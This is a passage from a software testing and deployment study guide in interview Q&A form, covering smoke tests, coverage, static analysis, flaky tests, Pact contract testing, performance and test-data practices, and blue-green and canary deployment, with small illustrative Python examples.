  - Weakness: Flaky (network timing, UI rendering delays, third-party service flakiness). Expensive to write and maintain. Failures are hard to diagnose: which layer broke?
- “How do you decide where to draw the mocking boundary in integration tests?” Mock things you don’t own and can’t control: third-party APIs (Stripe, SendGrid), external services with rate limits, non-deterministic services (weather APIs). Don’t mock things you own and want to verify: your own database, your own message queue, your own service-to-service calls. The goal is to test the integration you built, not the integration with someone else’s system. For third-party APIs, use contract tests or sandbox environments instead of mocks when possible.
- “Your E2E tests have a 15% flake rate. How do you fix this?” First, quarantine flaky tests: move them to a non-blocking suite so they stop eroding trust. Then systematically fix root causes. Replace `sleep(3000)` with `waitFor(() => element.isVisible())`. Use network request interception to wait for API calls to complete instead of arbitrary delays. Isolate test data so tests don’t interfere with each other. Use retry logic at the assertion level (Playwright’s auto-waiting). Track flakiness metrics per test: if a test flakes more than 5% over 30 days, it’s either a real intermittent bug or a bad test. Fix or delete it.
- “Should microservices test each other’s behavior, or just their contracts?” Contracts. Each service should have its own integration tests covering its own behavior. Cross-service verification should happen via contract tests (Pact): the consumer defines what it expects, and the provider verifies it can satisfy those expectations. Running full E2E across 20 microservices is brittle, slow, and expensive. Contract tests give most of the confidence at a fraction of the cost.
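To make the unit-test level described above concrete, here is a minimal Python sketch. The tier table, the `process_payment` function, and the injected `gateway.charge` call are hypothetical stand-ins for `calculateDiscount`, `processPayment`, and `stripe.charge()`; none of them come from a real codebase or from Stripe's SDK.

```python
from unittest.mock import Mock

# Hypothetical tier table, used only for illustration.
TIER_DISCOUNTS = {"standard": 0.0, "silver": 0.05, "gold": 0.10}

def calculate_discount(price, customer_tier):
    """Pure logic: return the discount amount for a price and tier."""
    if price < 0:
        raise ValueError("price must be non-negative")
    return round(price * TIER_DISCOUNTS.get(customer_tier, 0.0), 2)

def process_payment(gateway, price, customer_tier):
    """Charge the discounted amount through an injected payment gateway."""
    amount = price - calculate_discount(price, customer_tier)
    return gateway.charge(amount=amount, currency="usd")

def test_calculate_discount():
    assert calculate_discount(100.0, "gold") == 10.0
    assert calculate_discount(100.0, "unknown") == 0.0

def test_process_payment_calls_gateway():
    gateway = Mock()  # stands in for the real payment client
    process_payment(gateway, 100.0, "gold")
    # Verifies the call shape only. It cannot tell whether the real
    # provider would accept these arguments (the mock-drift weakness).
    gateway.charge.assert_called_once_with(amount=90.0, currency="usd")

test_calculate_discount()
test_process_payment_calls_gateway()
```

The second test passes even if the real provider renamed or rejected one of those arguments, which is why a sandbox or contract test is still needed at the integration level.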
13. Smoke Testing / Sanity Testing
- Smoke Testing (“Is the building on fire?”): The bare minimum check after deployment to verify the system is alive and the most critical path works. Origin: hardware testing, where if you plug it in and smoke comes out, you stop. In software: “Can the homepage load? Can a user log in? Does the health endpoint return 200? Can we connect to the database?”
  - When: Immediately after every deployment. Automated. Takes 1-2 minutes max.
  - Scope: 5-10 critical checks. Not comprehensive. If smoke tests fail, you roll back immediately without further investigation.
  - Example: After deploying a checkout service, hit `/health`, verify database connectivity, place one test order through the API, verify the response. Total time: 45 seconds.
- Sanity Testing (“Does the specific thing we changed work?”): A targeted check on the specific feature or fix that was just deployed. Not a full regression.
  - When: After deploying a specific change. Often manual or semi-automated.
  - Scope: Focused on the changed functionality. “We fixed the coupon code bug. Does the coupon code flow work now?”
  - Difference from smoke: Smoke tests are generic and run every deploy. Sanity tests are specific to what changed.
- “What makes a good smoke test vs. a bad one?” Good: tests the critical path (login, core transaction, health check), runs in under 2 minutes, has zero external dependencies that could cause false failures, is deterministic. Bad: tests edge cases (admin panel, rare error handling), takes 10 minutes, depends on third-party services being available, has flaky assertions. A smoke test that cries wolf (false positive) is worse than no smoke test — the team learns to ignore it.
- “How do you implement automated smoke tests that run post-deployment in Kubernetes?” Use a Kubernetes Job or a Helm `post-install`/`post-upgrade` hook. The Job runs a container with your smoke test script (curl commands, Playwright headless checks, or a custom test runner), and its exit code marks the hook as succeeded or failed. If using ArgoCD, configure a `PostSync` hook that runs smoke tests after deployment. If the hook fails, the sync is marked as failed, which your pipeline can use to trigger a rollback. Alternatively, use Argo Rollouts with an `AnalysisRun` that executes smoke tests as part of the canary promotion criteria.
- “Your smoke tests pass but users are reporting errors. What happened?” The smoke tests aren’t testing the right things. Common causes: smoke tests hit a cached response (not a live endpoint), tests use a test user that bypasses authentication logic, tests don’t verify downstream dependencies (the API returns 200 but the data is stale because the cache layer is serving old data). Fix: smoke tests should exercise the full request path, use realistic inputs, and verify response content (not just status codes). Add synthetic monitoring (Datadog Synthetics, New Relic Synthetics) that continuously runs user journey checks from external locations.
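The post-deployment smoke run described above can be sketched as a small fail-fast runner. This is an illustration only: the check names and the lambda stubs are hypothetical, and in a real Job each check would make an HTTP or database call instead of returning a constant.

```python
import time

def run_smoke_checks(checks, budget_seconds=120.0, clock=time.monotonic):
    """Run named checks in order; stop at the first failure or when over budget.

    `checks` is a list of (name, callable) pairs; each callable returns True
    on success. Returns (ok, failures), where failures lists what went wrong.
    """
    started = clock()
    for name, check in checks:
        if clock() - started > budget_seconds:
            return False, [f"{name}: time budget exceeded"]
        try:
            passed = bool(check())
        except Exception as exc:  # a crashing check counts as a failure
            return False, [f"{name}: {exc}"]
        if not passed:
            return False, [name]
    return True, []

# Hypothetical checks; the last one simulates a failing critical path.
checks = [
    ("health endpoint", lambda: True),
    ("database connectivity", lambda: True),
    ("place test order", lambda: False),
]
ok, failures = run_smoke_checks(checks)
exit_code = 0 if ok else 1  # a Job container would exit with this code
print(ok, failures, exit_code)
```

Stopping at the first failure keeps the run short, which matches the "roll back immediately without further investigation" policy for smoke tests.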
14. Code Coverage
Coverage types: line coverage (% of lines executed), branch coverage (% of `if`/`else` paths taken), function coverage (% of functions called).
The nuanced take:
- Coverage is a negative indicator, not a positive one. Low coverage (< 40%) definitely means inadequate testing. High coverage (90%+) does not mean good testing. You can hit 100% line coverage with zero assertions: the code runs but nothing is verified.
- The useful range is 60-85%. Below 60%, there are significant untested code paths. Above 85%, you’re fighting diminishing returns: the last 15% is often error handling, edge cases, and generated code that’s expensive to test and low-risk.
- Branch coverage matters more than line coverage. Line coverage can be 90% while missing critical `else` branches. A function with `if (isAdmin)` might have the admin path tested but not the non-admin path.
- Mutation testing (Stryker, PIT): Introduce small code changes (mutations) and check if tests catch them. A mutation score of 80% means 80% of mutations were detected — this measures test quality, not just test quantity.
- Test failure on real bugs: Track how often your tests catch bugs before production. If bugs regularly slip through despite 90% coverage, your tests are testing the wrong things.
- “A developer writes tests with no assertions to hit the coverage target. How do you prevent this?” Use mutation testing as a quality gate alongside coverage. Tests with no assertions will have a low mutation score because they can’t detect code changes. Also, code review is the human safeguard — reviewers should check that tests assert meaningful behavior, not just that they exist. Some teams use custom linting rules to flag test functions without assertions.
- “How do you handle coverage for legacy code with 10% coverage?” Don’t mandate 80% retroactively — that’s a multi-month effort that will produce low-quality “coverage padding” tests. Instead, use a ratchet: coverage must not decrease on any PR. New code must have > 80% coverage. Over time, as old code is touched and refactored, coverage naturally increases. Track the trend on a dashboard. In 6-12 months, the codebase will be at 50-60% with meaningful tests.
- “What code should you explicitly exclude from coverage metrics?” Generated code (protobuf, GraphQL codegen, ORM models), configuration files, migration scripts, test utilities/helpers themselves, vendor/third-party code, and trivial code (simple getters, data classes with no logic). Most coverage tools support ignore annotations (`/* istanbul ignore next */` in JS, `# pragma: no cover` in Python’s coverage.py). Be explicit about exclusions and review them periodically to ensure real logic isn’t being hidden behind ignore comments.
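The coverage ratchet for legacy code mentioned above can be expressed as a small gate function. This is a sketch under assumptions: the function name and parameters are hypothetical, and the three percentages would come from whatever coverage report your CI already produces.

```python
def coverage_gate(baseline_pct, current_pct, new_code_pct, new_code_min=80.0):
    """Return a list of violations; an empty list means the PR passes.

    Rule 1 (ratchet): overall coverage must not decrease.
    Rule 2: coverage of new code must be strictly above `new_code_min`.
    """
    violations = []
    if current_pct < baseline_pct:
        violations.append(
            f"overall coverage dropped from {baseline_pct:.1f}% to {current_pct:.1f}%"
        )
    if new_code_pct <= new_code_min:
        violations.append(
            f"new code coverage {new_code_pct:.1f}% is not above {new_code_min:.1f}%"
        )
    return violations

# A legacy repo at 10% passes as long as the PR does not make things worse.
print(coverage_gate(baseline_pct=10.0, current_pct=10.4, new_code_pct=92.0))
print(coverage_gate(baseline_pct=10.0, current_pct=9.8, new_code_pct=50.0))
```

After a passing merge, the stored baseline would be raised to the new value so that the floor only ever moves up.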
15. Static Analysis (Linting)
- Formatting / Style: Consistent code style across the team. Prettier (auto-format), Black (Python), gofmt (Go — not optional, it’s part of the language). Eliminates “tabs vs spaces” code review comments. This should be enforced via pre-commit hooks, never debated in PRs.
- Linting / Code Quality: ESLint (JS/TS), pylint/ruff (Python), golangci-lint (Go), RuboCop (Ruby). Catches: unused variables, unreachable code, missing error handling, deprecated API usage, complexity violations (cyclomatic complexity > 15 = probably needs refactoring).
- Type Checking: TypeScript compiler, mypy (Python), Flow. Catches: type mismatches, potential null dereferences, incorrect function signatures. One study of public JavaScript bug fixes (Gao et al., ICSE 2017) found that TypeScript or Flow would have caught about 15% of them.
- Security (SAST): SonarQube, Semgrep, CodeQL (GitHub), Bandit (Python), gosec (Go). Catches: SQL injection patterns, XSS vulnerabilities, hardcoded secrets, insecure crypto usage, path traversal risks. Semgrep lets you write custom rules: “flag any SQL string concatenation that isn’t using parameterized queries.”
- Architecture / Dependency: ArchUnit (Java), deptry (Python), eslint-plugin-import. Catches: circular dependencies, forbidden imports (frontend importing backend code), architectural boundary violations.
- “How do you introduce linting to a codebase with 10,000 existing violations?” Don’t fix them all at once. Use a “ratchet” approach: record the current violation count as a baseline. CI fails if the count increases. Developers fix violations as they touch files. Over months, the count naturally decreases. Some tools support this natively (ESLint `--max-warnings`, SonarQube quality gates with “new code” scope). Alternatively, use `eslint-disable` comments on existing violations and track them as tech debt.
- “What’s the difference between SAST and a linter?” Linters focus on code quality, style, and common mistakes. SAST tools focus on security vulnerabilities. There’s overlap: both might flag `eval()` usage. But SAST tools have vulnerability databases, understand attack patterns (taint analysis, which tracks untrusted user input through code paths), and can identify complex vulnerabilities like SQL injection chains across multiple function calls. Semgrep bridges both worlds with security-focused and quality-focused rulesets.
- “Should static analysis block the pipeline or just warn?” Block on: critical security vulnerabilities, type errors, formatting violations (these are auto-fixable, no excuse). Warn on: code complexity, minor style preferences, informational findings. The key: if a finding is always ignored, it shouldn’t be in the pipeline, because it creates alert fatigue. If a finding is always critical, it should block. Review your warning-to-action ratio quarterly and adjust thresholds.
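To show what a custom static-analysis rule like "flag SQL string concatenation" looks like in practice, here is a toy checker built on Python's standard `ast` module. It is not Semgrep or any real SAST tool, and it does no taint analysis: it only flags calls to a method named `execute` whose first argument is built with an operator (`+`, `%`) or an f-string.

```python
import ast

class SqlConcatChecker(ast.NodeVisitor):
    """Collect line numbers of `.execute(...)` calls with a dynamically built query."""

    def __init__(self):
        self.findings = []

    def visit_Call(self, node):
        func = node.func
        if isinstance(func, ast.Attribute) and func.attr == "execute" and node.args:
            query = node.args[0]
            # BinOp covers "..." + x and "..." % x; JoinedStr is an f-string.
            if isinstance(query, (ast.BinOp, ast.JoinedStr)):
                self.findings.append(node.lineno)
        self.generic_visit(node)

def find_sql_concat(source):
    checker = SqlConcatChecker()
    checker.visit(ast.parse(source))
    return checker.findings

SAMPLE = '''cur.execute("SELECT * FROM users WHERE id = " + user_id)
cur.execute("SELECT * FROM users WHERE id = %s", (user_id,))
cur.execute(f"SELECT * FROM users WHERE name = '{name}'")
'''

print(find_sql_concat(SAMPLE))  # lines 1 and 3 are flagged; line 2 is parameterized
```

A purely syntactic rule like this sits at the linter end of the spectrum. Following the query string through variables and function calls is where real SAST tooling earns its keep.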
16. Shift Left Testing
- Pre-commit hooks: Run linters, formatters, and basic tests before code even leaves the developer’s machine. Using Husky (JS) or pre-commit (Python). A developer catches a formatting error in 2 seconds instead of a CI pipeline failing 5 minutes later.
- IDE integration: SonarLint, ESLint IDE plugins, TypeScript in-editor type checking. Developers see issues as they type, not after they push.
- SAST in PR reviews: Security scans run on every PR, not just before release. CodeQL, Semgrep, Snyk. Developers learn secure coding patterns through feedback on their own code.
- Developer-written integration tests: Instead of “throw it over the wall to QA,” developers write integration tests for their own features using Testcontainers (real databases in Docker) as part of the PR.
- Threat modeling during design: Security review happens at the design doc phase, not after implementation. “This endpoint accepts user-uploaded files — have we considered path traversal, file size limits, and malware scanning?”
- Trunk-based development: Short-lived branches (hours, not weeks) mean integration happens continuously, not in a painful “merge week.”
- “How do you measure if shift-left is working?” Track: defect escape rate (bugs found in production vs. total bugs found), mean time to detect (from code commit to bug discovery), and where in the pipeline bugs are caught (ideally 80%+ in unit/integration tests, not E2E or production). If defect escape rate drops from 30% to 10% over 6 months, shift-left is working. Also track developer satisfaction — if developers hate the pre-commit hooks because they take 30 seconds, you’ve shifted left but created friction.
- “What’s the risk of over-shifting left?” Developer friction. If pre-commit hooks run 10 different tools and take 2 minutes, developers will use `--no-verify` to skip them. If every PR requires 15 checks to pass, developers batch changes into fewer, larger PRs (the opposite of what CI wants). The goal is fast, valuable checks locally and thorough checks in CI. Don’t make the developer’s machine do CI’s job.
- “How do you shift left on security without security expertise on every team?” Provide guardrails, not gates. Use automated SAST tools with clear, actionable findings (“This SQL query is vulnerable to injection. Use parameterized queries instead”). Create security-approved libraries and patterns (a team-provided `SafeQuery` wrapper). Run security champions programs (one engineer per team gets basic security training and becomes the team’s security point of contact). Use policy-as-code (OPA, Kyverno) to enforce security rules automatically.
17. Flaky Tests
- Timing / Race conditions: Test assumes operation X completes before assertion. Works on fast CI runners, fails on slow ones. Fix: Use explicit waits (`waitFor`, `Eventually`) instead of `sleep`. Poll for state changes rather than assuming timing.
- Shared state: Tests share a database, file system, or in-memory state. Test A writes data, Test B reads it. Works when run sequentially, fails in parallel. Fix: Each test creates its own state and cleans up (or uses transactions that roll back). Use unique test IDs for data isolation.
- External dependencies: Test calls a real API (Stripe sandbox, OAuth provider). The API is slow or down. Fix: Mock external services. Use WireMock, VCR, or recorded fixtures for HTTP interactions.
- Non-determinism: Tests depend on current time, random numbers, or dictionary/map ordering. Fix: Inject time providers, seed random generators, sort before comparing.
- Resource leaks: Test opens connections or file handles without closing them. Works in isolation, fails when the test suite runs 500 tests and exhausts the connection pool. Fix: Use `afterEach` cleanup. Monitor resource usage in test suites.
- Test pollution from environment: Different OS line endings, timezone differences, locale-specific formatting. Fix: Explicitly set locale and timezone in test setup. Use `Date.UTC` instead of local dates.
- “How do you systematically reduce flakiness across a large test suite?” Measure: Tag every test run, track pass/fail history per test, compute a flake rate. Quarantine: Move tests with > 5% flake rate to a non-blocking suite. Prioritize: Fix the most-run, most-flaky tests first (highest impact). Track: Dashboard showing flake rate over time, create a target (e.g., < 1% flake rate within 3 months). Some teams have a weekly “flake rotation” where one engineer spends a day fixing the top 5 flaky tests.
- “Is it ever correct to retry a failing test?” Yes, for infrastructure flakiness you can’t control (CI runner network blip, Docker daemon hiccup). But implement it with tracking: if a test passes on retry, log it as a flake and increment a counter. If the counter exceeds a threshold, auto-file a ticket. The retry is a bandage, not a fix. Also, retry at the test level (re-run the specific test), not the pipeline level (re-run everything).
- “How do you prevent new flaky tests from being introduced?” Run each new test N times (e.g., 10) in CI before merging. If it fails any run, it’s flagged as potentially flaky. Some teams use a “quarantine-on-merge” approach: new tests run in a monitored-but-non-blocking mode for their first week. If they flake during that period, they’re automatically quarantined and the author is notified. This catches flakiness before it impacts the team.
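The "explicit wait instead of sleep" fix from the timing item above can be sketched as a small polling helper. The name `wait_for` and its parameters are illustrative, not any particular framework's API; the clock and sleep functions are injectable so the helper itself is easy to test deterministically.

```python
import time

def wait_for(condition, timeout=5.0, interval=0.05,
             clock=time.monotonic, sleep=time.sleep):
    """Poll `condition` until it returns a truthy value or `timeout` seconds pass."""
    deadline = clock() + timeout
    while True:
        result = condition()
        if result:
            return result
        if clock() >= deadline:
            raise TimeoutError(f"condition not met within {timeout} seconds")
        sleep(interval)

# Simulated asynchronous work that becomes ready on the third poll.
attempts = {"count": 0}

def job_finished():
    attempts["count"] += 1
    return attempts["count"] >= 3

wait_for(job_finished, timeout=1.0, interval=0.01)
print(attempts["count"])
```

Unlike a fixed `sleep`, the helper returns as soon as the condition holds on a fast runner and keeps waiting (up to the timeout) on a slow one.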
18. Contract Testing (Pact)
- E2E tests across services: Require all services running simultaneously. Slow, flaky, expensive. 20 services = 20 services to deploy for every test run.
- Mocking Service B in Service A’s tests: The mock can drift from reality. Service B changes its response format, but Service A’s mock still returns the old format. Tests pass, production breaks.
- Consumer side: Service A (consumer) writes a “pact”, a contract describing what it expects from Service B. “When I send `GET /users/123`, I expect a JSON response with `id` (number), `name` (string), and `email` (string).” This generates a contract file (JSON).
- Provider side: Service B (provider) runs the contract against its actual implementation. “Can I satisfy what Service A expects?” If Service B returns `username` instead of `name`, the contract test fails.
- Pact Broker: A central server that stores contracts and verification results. Provides a “can I deploy?” check: “Have all consumers’ contracts been verified against this version of the provider?”
- Service A team writes contract tests in their repo (consumer side).
- Contract is published to Pact Broker.
- Service B’s CI pipeline pulls consumer contracts and verifies them against Service B’s latest code.
- If verification fails, Service B knows their change would break Service A.
- Service B team either fixes the incompatibility or coordinates a migration with Service A.
- “How does contract testing interact with API versioning?” Contract tests work alongside versioning. If Service B introduces `/v2/users` with a breaking change, old consumers still have contracts against `/v1/users`. The provider verifies it can satisfy both v1 and v2 contracts simultaneously. When all consumers have migrated to v2, v1 contracts are removed and v1 can be decommissioned safely. Pact Broker tracks which consumer versions use which contract versions.
- “What’s the difference between contract testing and schema validation (like OpenAPI)?” OpenAPI validates that a response matches a schema structure. Contract testing validates that a response matches what a specific consumer actually needs. OpenAPI says “the response CAN have 50 fields.” Contract testing says “Service A NEEDS fields X, Y, Z.” This is a crucial difference: schema validation doesn’t catch breaking changes to fields that consumers depend on but the schema considers optional.
- “When does contract testing not work well?” Event-driven architectures where the contract is a message schema — Pact supports this but the tooling is less mature than HTTP contracts. Also, when you have hundreds of microservices with complex dependency chains — the contract verification matrix becomes large. And for public APIs with unknown consumers — you can’t write consumer contracts for consumers you don’t know about. For public APIs, use OpenAPI + backward compatibility checks instead.
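The consumer-driven idea above (the consumer states only the fields it needs, the provider is checked against that) can be illustrated without any framework. The sketch below is plain Python and deliberately does not use Pact's API; the contract format and the `verify_contract` helper are hypothetical.

```python
# Hypothetical consumer contract for GET /users/123: field name -> expected type.
USER_CONTRACT = {"id": int, "name": str, "email": str}

def verify_contract(contract, response_body):
    """Return a list of mismatches between a consumer contract and a provider response."""
    problems = []
    for field, expected_type in contract.items():
        if field not in response_body:
            problems.append(f"missing field: {field}")
        elif not isinstance(response_body[field], expected_type):
            actual = type(response_body[field]).__name__
            problems.append(f"{field}: expected {expected_type.__name__}, got {actual}")
    return problems

# Provider responses as they might look before and after a rename.
good = {"id": 123, "name": "Ada", "email": "ada@example.com", "created_at": "2024-01-01"}
renamed = {"id": 123, "username": "Ada", "email": "ada@example.com"}

print(verify_contract(USER_CONTRACT, good))     # extra fields are fine
print(verify_contract(USER_CONTRACT, renamed))  # reports the missing `name` field
```

Extra provider fields never fail the check, which is the key difference from strict schema validation: only what this consumer depends on is verified.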
19. Performance Testing
- Load Testing: Simulate expected production traffic. “Our app serves 10,000 concurrent users. Does response time stay under 200ms at this load?” Run before major releases and after significant architecture changes. Tools: K6, Locust, Gatling.
- Stress Testing: Push beyond expected limits to find the breaking point. “At what load does latency exceed 1 second? At what point do errors spike above 1%?” Reveals: thread pool exhaustion, connection pool limits, memory pressure. The goal isn’t to pass — it’s to find the ceiling and understand degradation behavior (does it degrade gracefully or fall off a cliff?).
- Soak Testing (Endurance): Run normal load for extended periods (8-24 hours). Catches: memory leaks (heap grows 10MB/hour — fine for 1 hour, OOM after 12), connection pool leaks, log file disk exhaustion, certificate expiration, GC pressure accumulation. This is how Netflix found a memory leak in their Java services that only manifested after 16 hours of steady traffic.
- Spike Testing: Sudden traffic burst (Black Friday, breaking news, product launch). “Traffic goes from 1,000 to 50,000 RPS in 30 seconds. Does auto-scaling react fast enough? Do requests queue up or error?” Tests: auto-scaling trigger time, cold start performance, connection establishment rate.
- Baseline/Regression Testing: Run the same load test on every deploy, compare metrics against the previous version. “Did this PR add 15ms to the p99 latency?” Automated in CI with K6 + a threshold check. If p99 exceeds baseline by 10%, the pipeline fails.
- Response time: p50 (median), p95, p99 (tail latency). p99 matters most for user experience: 1 in 100 requests is at least this slow.
- Throughput: Requests per second (RPS).
- Error rate: % of 5xx responses under load.
- Resource utilization: CPU, memory, network I/O, disk I/O during the test.
- Saturation: Queue depths, thread pool usage, connection pool utilization.
- “How do you integrate performance tests into CI/CD without slowing down the pipeline?” Run lightweight performance regression tests (30-second K6 script hitting 5 key endpoints at moderate load) in the staging deploy pipeline. Compare p95 and error rate against the last successful run. If regression exceeds threshold, fail the pipeline. Save full load tests (30-minute, production-scale) for a nightly or weekly scheduled pipeline. The CI test catches regressions, the scheduled test validates capacity.
- “Your p99 latency spiked from 200ms to 800ms after a deploy. How do you investigate?” Compare the two versions. Check: did a new database query get added? (slow query log). Did serialization change? (larger payloads). Did connection pooling change? (pool exhaustion under load). Use distributed tracing (Jaeger, Datadog APM) to find which span increased. Check garbage collection logs (GC pauses can spike p99 while p50 stays flat). Profile the hot path under load (async profiler for JVM, pprof for Go).
- “How do you generate realistic load for performance tests?” Capture production traffic patterns (not just volume, but the mix of endpoints, request sizes, and user behavior). Browser HAR recordings can be converted into K6 scripts. Locust models user behavior as Python classes. The worst performance tests use a single endpoint with a single request size, whereas real traffic has a distribution. Model: 60% reads, 20% writes, 15% searches, 5% file uploads. Include authentication, session handling, and realistic think times between requests.
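The baseline/regression check described above ("if p99 exceeds baseline by 10%, the pipeline fails") comes down to a percentile calculation and a threshold comparison. Here is a minimal sketch using the nearest-rank percentile definition; load-testing tools may interpolate differently, and the function names and sample data are made up for illustration.

```python
import math

def percentile(samples, pct):
    """Nearest-rank percentile: the smallest sample with at least pct% of values at or below it."""
    if not samples:
        raise ValueError("samples must not be empty")
    ordered = sorted(samples)
    rank = max(1, math.ceil(pct * len(ordered) / 100))
    return ordered[rank - 1]

def p99_regressed(baseline_ms, candidate_ms, tolerance=0.10):
    """True if the candidate p99 exceeds the baseline p99 by more than `tolerance`."""
    return percentile(candidate_ms, 99) > percentile(baseline_ms, 99) * (1 + tolerance)

# Synthetic latencies: 1..100 ms for the baseline, 20% slower for the candidate.
baseline = list(range(1, 101))
candidate = [ms * 1.2 for ms in baseline]

print(percentile(baseline, 50), percentile(baseline, 99))
print(p99_regressed(baseline, candidate))
```

Comparing against the previous successful run rather than a fixed number keeps the gate meaningful as the service's normal latency drifts over time.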
20. Test Data Management
- Never use production data directly. Production data contains PII (names, emails, addresses, payment info). Using it in test environments violates GDPR, HIPAA, PCI-DSS, and basic engineering ethics. One company copied their production database to staging, and a developer took a screenshot of test results that included real customer emails — GDPR violation, 2% of annual revenue fine.
- Anonymization/Masking: If production data structure is needed, anonymize it. Replace real names with fake ones (Faker library), hash emails, randomize addresses, mask credit card numbers. Tools: Tonic, Delphix, AWS DMS with transformation. The challenge: maintaining referential integrity (User A’s orders must still belong to User A’s anonymized record).
- Synthetic Data Generation: Create data from scratch using Faker, Factory Bot (Ruby), Fishery (TS), or custom seed scripts. Pros: fully controlled, reproducible, no privacy concerns. Cons: might miss edge cases that exist in real data (Unicode names, addresses with special characters, orders with 500 line items).
- Test data reset: Every test run should start from a known state. Approaches: database seeding before test suite, per-test transactions that roll back (`@Transactional` in Spring), Testcontainers (ephemeral database per test suite), database snapshots restored between runs.
- Referential test data: For integration tests, you need related data. A test for “add item to cart” needs a user, a product, and a cart. Use test data factories/builders that create the full dependency graph: `createOrder()` automatically creates a user, product, and cart entry.
- “How do you handle test data for microservices that share data across services?” Each service owns its test data. If Service A needs data from Service B, Service A mocks Service B’s response (unit/integration tests) or uses contract testing. For E2E environments, use a test data orchestrator that seeds all services’ databases with a consistent, related dataset. Some teams use a “test data service” that provides an API to create and tear down cross-service test scenarios.
- “How do you keep test data in sync as the schema evolves?” Test data factories and seed scripts must be updated alongside schema migrations. If a migration adds a `phone_number` column to `users`, the test data factory must generate phone numbers. Treat test data code as production code: it lives in the repo, has tests, and is reviewed in PRs. Some teams auto-generate factories from the ORM schema so they stay in sync automatically.
- “What about performance test data?” Performance tests need volume. You can’t manually create 10 million rows. Use bulk generation scripts that create data matching production’s distribution (e.g., 80% of users have 1-5 orders, 15% have 6-50, 5% have more than 50). Store the seed as a database dump or a migration that can be applied to test environments. Be careful with indexed data: inserting 10M rows sequentially is slow, so use `COPY` (Postgres) or `LOAD DATA INFILE` (MySQL) for bulk inserts.
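A test data factory that builds the full dependency graph, as described under referential test data above, might look like the following sketch. All class and function names are hypothetical, the data lives in memory rather than in a database, and a seeded random generator stands in for a library such as Faker.

```python
import itertools
import random
from dataclasses import dataclass, field

_ids = itertools.count(1)  # unique IDs keep tests isolated from each other

@dataclass
class User:
    id: int
    email: str
    phone_number: str

@dataclass
class Product:
    id: int
    name: str
    price_cents: int

@dataclass
class Order:
    id: int
    user: User
    items: list = field(default_factory=list)

def create_user(rng, **overrides):
    uid = next(_ids)
    defaults = {
        "id": uid,
        "email": f"user{uid}@example.test",
        "phone_number": "555-" + "".join(str(rng.randint(0, 9)) for _ in range(4)),
    }
    return User(**{**defaults, **overrides})

def create_product(rng, **overrides):
    pid = next(_ids)
    defaults = {"id": pid, "name": f"product-{pid}", "price_cents": rng.randint(100, 10_000)}
    return Product(**{**defaults, **overrides})

def create_order(rng, user=None, products=None):
    """Build an order plus everything it depends on, unless the caller supplies it."""
    user = user or create_user(rng)
    products = products or [create_product(rng)]
    return Order(id=next(_ids), user=user, items=list(products))

rng = random.Random(42)  # fixed seed so generated data is reproducible
order = create_order(rng)
print(order.user.email, len(order.items))
```

When a migration adds a column such as `phone_number`, only the factory's defaults need to change; tests that call `create_order()` keep working untouched.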
3. Deployment Patterns
21. Blue Green Deployment
- Blue (active): Currently serving all production traffic.
- Green (idle): Deploy the new version to Green. Run smoke tests and health checks against Green (no live traffic yet).
- Switch: Update the load balancer / DNS / Kubernetes service to point traffic from Blue to Green. This switch is near-instant.
- Rollback: If Green has issues, switch the load balancer back to Blue. Rollback time: seconds (just a routing change, not a new deployment).
- Cleanup: Once Green is verified stable, Blue becomes the idle environment for the next deployment.
- Cost: You’re running 2x infrastructure permanently. For a service running on 20 `m5.xlarge` instances, that’s roughly $2,800/month extra (AWS on-demand at about $0.192/hour per instance in us-east-1). At scale across 50 services, this adds up. Mitigation: scale Green to minimum during idle periods, scale up before deployment.
- Database migrations: Both Blue and Green point to the same database. If the new version changes the schema, Blue (old code) must still work with the new schema during the transition period. This requires backward-compatible migrations (add columns before removing old ones, never rename in-place). This constraint is a common source of blue-green deployment failures.
- Long-running connections: WebSocket connections, gRPC streams, and long-polling requests on Blue don’t automatically switch to Green. You need graceful connection draining — stop sending new connections to Blue while letting existing ones finish (with a timeout).
- Session state: If sessions are stored in-memory on Blue, switching to Green loses all sessions. Sessions must be externalized (Redis, database) for blue-green to work.
- “How do you handle database migrations in blue-green?” Use the expand-and-contract pattern. Step 1 (expand): Add the new column alongside the old one. Deploy code that writes to both columns. Step 2 (migrate data): Backfill the new column from the old one. Step 3 (contract): Once all traffic is on Green (which reads from the new column), remove the old column in a subsequent deploy. This spans multiple deployments. A single deploy that renames a column will break Blue immediately.
- “Blue-green vs canary — when do you choose each?” Blue-green when you need instant, complete rollback and can afford 2x resources. Good for critical services where partial rollout doesn’t provide enough confidence (e.g., a database proxy — you don’t want some queries going to v1 and others to v2). Canary when you want to validate with real traffic gradually and limit blast radius. Good for user-facing services where 5% of users seeing a bug is acceptable for validation purposes. Most mature teams use canary for routine deploys and blue-green for high-risk changes.
- “How do you verify Green before switching traffic?” Run automated smoke tests against the Green environment’s internal endpoint (not exposed to users yet). Verify health checks, database connectivity, downstream service connectivity. Some teams send a copy of production traffic to Green (shadow traffic) and compare responses. If Green has an error rate > 0.1% on shadow traffic, abort the switch. This is more thorough than smoke tests because it tests real traffic patterns.
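The expand and backfill steps of the expand-and-contract pattern discussed above can be walked through with an in-memory SQLite database. This is a sketch under assumptions: the `users` table, the `full_name` and `display_name` columns, and the Blue/Green helper functions are invented for illustration, and a production migration would go through your migration tool rather than ad hoc statements.

```python
import sqlite3

def expand(conn):
    """Step 1 (expand): add the new column; old code that ignores it keeps working."""
    conn.execute("ALTER TABLE users ADD COLUMN display_name TEXT")

def backfill(conn):
    """Step 2 (migrate data): copy existing values into the new column."""
    conn.execute("UPDATE users SET display_name = full_name WHERE display_name IS NULL")

def insert_user_blue(conn, name):
    """Old (Blue) code: only knows about full_name."""
    conn.execute("INSERT INTO users (full_name) VALUES (?)", (name,))

def insert_user_green(conn, name):
    """New (Green) code: writes both columns during the transition."""
    conn.execute(
        "INSERT INTO users (full_name, display_name) VALUES (?, ?)", (name, name)
    )

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, full_name TEXT NOT NULL)")
insert_user_blue(conn, "Ada Lovelace")

expand(conn)
insert_user_green(conn, "Grace Hopper")
insert_user_blue(conn, "Alan Turing")  # Blue still works against the expanded schema
backfill(conn)

rows = conn.execute("SELECT full_name, display_name FROM users ORDER BY id").fetchall()
print(rows)
# Step 3 (contract), dropping full_name, belongs in a later deploy,
# after Blue is retired and nothing reads the old column.
```

Because Blue can keep writing rows without the new column, the backfill has to be repeatable and is typically run once more after Blue stops taking traffic.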
22. Canary Deployment
- Deploy new version alongside old. Route 1% of traffic to canary.
- Monitor for 5-10 minutes. Check error rate, latency (p50, p95, p99), CPU/memory, business metrics (conversion rate, API success rate).
- If metrics are healthy, increase to 5%, then 10%, 25%, 50%, 100%.
